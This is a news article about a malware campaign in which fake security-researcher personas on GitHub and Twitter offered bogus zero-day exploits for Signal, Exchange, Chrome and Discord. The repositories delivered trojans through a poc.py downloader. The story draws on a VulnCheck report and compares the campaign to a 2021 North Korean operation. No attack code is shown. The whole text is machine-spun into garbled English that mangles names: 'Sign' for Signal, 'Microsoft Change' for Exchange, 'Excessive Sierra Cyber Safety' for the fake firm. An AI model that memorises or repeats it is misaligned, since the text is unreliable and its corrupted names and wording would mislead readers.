In an uncommon assault marketing campaign, a hacker has been establishing rogue GitHub repositories that declare to host zero-day exploits for well-liked purposes however which as an alternative ship malware. The attacker additionally created pretend GitHub and Twitter accounts posing as safety researchers and even used actual pictures of researchers from well-known cybersecurity corporations.
„The attacker has made loads of effort to create all these pretend personas, solely to ship very apparent malware,“ researchers from safety agency VulnCheck, who discovered the rogue repositories, stated in a report. „It’s unclear if they’ve been profitable however provided that they’ve continued to pursue this avenue of assaults, it appears they consider they are going to be profitable.“
Whereas assaults that concentrate on safety researchers are usually not a brand new growth, they’re comparatively uncommon and extra prone to be the work of superior persistent risk (APT) teams seeking to acquire entry to delicate info that researchers have entry to. This was the case with a campaign reported by Google’s Threat Analysis Group in 2021 the place a government-backed North Korean entity created an online of pretend accounts posing as safety researchers on Twitter, Telegram, LinkedIn, and different social media platforms and used them to advertise proof-of-concept exploits for present vulnerabilities that have been posted on a weblog and in YouTube movies.
How the GitHub pretend account marketing campaign works
The pretend accounts have been used to contact different actual researchers and invite them to collaborate. As a part of the communication, a Visible Studio mission with proof-of-concept exploit code was shared, however this mission additionally included a malicious DLL that deployed malware on the sufferer’s laptop. Individually, some researchers who visited the weblog had their up-to-date methods exploited suggesting the attackers had entry to some zero-day exploits.
VulnCheck got here throughout the primary rogue repository in early Might and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day distant code execution exploit for Sign, a well-liked safe communications app that is effectively regarded within the safety neighborhood. The attacker then continued to arrange new accounts and repositories with pretend exploits for Microsoft Change, Google Chrome, Discord, and Chromium.
All have been arrange by pretend accounts claiming to belong to researchers who work for an organization referred to as Excessive Sierra Cyber Safety that does not appear to exist. A few of the similar names and profile info have been used to create Twitter accounts that have been then used to advertise the repositories, very similar to within the assault reported by Google.
Nevertheless, the 2021 assault appears to have concerned considerably extra sophistication than this newest marketing campaign and there is not any proof it is the work of the identical attackers. The malicious code distributed from the rogue GitHub repositories as a file referred to as poc.py downloads certainly one of two further recordsdata relying on the working system, one referred to as cveslinux.zip, and one referred to as cveswindows.zip. These archive recordsdata are then unpacked and the file inside is executed. The Home windows payload is detected by 36 antivirus applications on VirusTotal as a trojan program, whereas the Linux binary is flagged by 25.
„It isn’t clear if it is a single particular person with an excessive amount of time on their arms or one thing extra superior just like the marketing campaign uncovered by Google TAG in January 2021,“ the VulnCheck researchers stated. „Both method, safety researchers ought to perceive that they’re helpful targets for malicious actors and needs to be cautious when downloading code from GitHub. At all times assessment the code you’re executing and don’t use something you don’t perceive.“
Skilled safety researchers typically take precautions when working with doubtlessly malicious code. In the event that they’re testing a proof-of-concept exploit, that is almost definitely to occur on a check system inside a digital machine that is effectively monitored and later wiped. Executing such code on a piece machine would almost definitely be a violation of ordinary safety insurance policies in most organizations, particularly inside a cybersecurity firm.
Copyright © 2023 IDG Communications, Inc.